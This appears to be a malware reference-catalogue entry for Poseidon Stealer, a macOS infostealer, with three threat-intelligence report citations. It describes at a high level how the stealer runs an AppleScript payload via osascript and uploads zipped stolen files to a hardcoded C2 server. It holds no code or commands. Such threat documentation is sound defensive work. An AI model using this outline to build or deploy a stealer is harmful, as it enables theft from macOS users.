SYMBOLCOMMON_NAMEaka. SYNONYMS
osx.poseidonstealer (Back to overview)

Poseidon Stealer

aka: Rodrigo Stealer

macOS infostealer sold by an individual named Rodrigo4, currently consisting of a disk image containing a Mach-O without app bundle, which when executed spawns osascript executing an AppleScript with the actual infostealer payload. The AppleScript payload will steal files by packing them in a ZIP archive and uploading them to a hardcoded C2 via HTTP.

References
2024-07-11NCSC SwitzerlandNCSC Switzerland
Brief technical analysis of the "Poseidon Stealer" malware
Poseidon Stealer
2024-06-27GovCERT.chGovCERT.ch
Poseidon Stealer malspam campaign targeting Swiss macOS users
Poseidon Stealer
2024-06-24Malwarebytes LabsJérôme Segura
‘Poseidon’ Mac stealer distributed via Google ads
Poseidon Stealer

There is no Yara-Signature yet.